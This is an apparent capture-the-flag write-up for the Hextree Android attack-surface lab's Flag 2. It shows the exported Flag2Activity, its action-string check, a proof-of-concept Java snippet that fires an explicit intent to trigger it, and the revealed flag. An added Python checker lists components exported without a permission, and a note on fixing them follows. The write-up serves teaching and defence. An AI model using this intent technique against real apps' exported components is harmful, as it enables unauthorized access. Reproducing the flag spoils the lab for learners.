Static Analysis
AndroidManifest.xml
Upon inspecting Flag2Activity in the AndroidManifest.xml file, we see the following:
    <activity
        android:name="io.hextree.attacksurface.activities.Flag2Activity"
        android:exported="true">
        <intent-filter>
Since exported is set to true, we can call this activity from our exploit APK. Let's review the code to see how we can get the flag.
Flag2Activity Class
    public class Flag2Activity extends AppCompactActivity {
        public Flag2Activity() {
            this.name = "Flag 2 - Intent with extras";
            this.flag = "isqgqnB4bH/YSoOdSSLAG9gapPgYCyFBT7e3/3lUoAfTX5K9HeR5F8xSBndpPZT1";
        }

        @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
        protected void onCreate(Bundle bundle) {
            super.onCreate(bundle);
            this.f = new LogHelper(this);
            // The only gate is the intent's action string, which the sender controls.
            String action = getIntent().getAction();
            if (action == null || !action.equals("io.hextree.action.GIVE_FLAG")) {
                return;
            }
            this.f.addTag(action);
            success(this);
        }
    }
We can see here that if the intent's action is not set to io.hextree.action.GIVE_FLAG, onCreate returns without giving us the flag, so all we need to do is send an intent with this specific action.
Creating POC
In our APK, we add a button that fires an intent with the desired action at Flag2Activity:
    // Placed in the PoC activity's onCreate(), after setContentView().
    Button button = findViewById(R.id.button_flag2);
    button.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {
            Log.v("HEXTREE", "Going to flag 2 activity");
            Intent intent = new Intent();
            // Explicit intent: name the target package and activity class directly.
            intent.setComponent(
                    new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag2Activity"));
            // The action string that Flag2Activity.onCreate() checks for.
            intent.setAction("io.hextree.action.GIVE_FLAG");
            startActivity(intent);
        }
    });
Flag
HXT{intent-actions-activity-dsj198w}
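The manifest check from the Static Analysis section can be automated when reviewing your own app. The following is an added example, not part of the original write-up or the Hextree app: it lists every component in a decoded AndroidManifest.xml that other apps can start without holding a permission, which is the condition that made Flag2Activity reachable. The sample manifest is constructed; InternalActivity, GuardedActivity, LegacyReceiver and the com.example names are assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "activity-alias", "service", "receiver")

# Constructed sample. Flag2Activity carries only the attributes shown on the
# page; every other component and the com.example names are assumptions.
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="io.hextree.attacksurface">
  <application>
    <activity android:name="io.hextree.attacksurface.activities.Flag2Activity"
        android:exported="true"/>
    <activity android:name=".InternalActivity" android:exported="false"/>
    <activity android:name=".GuardedActivity" android:exported="true"
        android:permission="com.example.permission.INTERNAL"/>
    <receiver android:name=".LegacyReceiver">
      <intent-filter><action android:name="com.example.PING"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


def exported_without_permission(manifest_xml):
    """Return (tag, name, reason) for components any installed app can reach."""
    app = ET.fromstring(manifest_xml).find("application")
    if app is None:
        return []
    # A permission on <application> is the default for all of its components.
    app_perm = app.get(ANDROID + "permission")
    findings = []
    for comp in app:
        if comp.tag not in COMPONENTS:
            continue
        exported = comp.get(ANDROID + "exported")
        if exported == "true":
            reason = "exported=true"
        elif exported is None and comp.find("intent-filter") is not None:
            # Apps targeting below Android 12 export filtered components by default.
            reason = "implicit export (intent-filter)"
        else:
            continue
        # Any permission counts as a gate here; its protectionLevel still needs review.
        if not (comp.get(ANDROID + "permission") or app_perm):
            findings.append((comp.tag, comp.get(ANDROID + "name"), reason))
    return findings


if __name__ == "__main__":
    for finding in exported_without_permission(SAMPLE):
        print(finding)
```

For a component that must stay exported, the fix is a signature-level permission or validation of the caller, since an action string check like the one in Flag2Activity is satisfied by any sender.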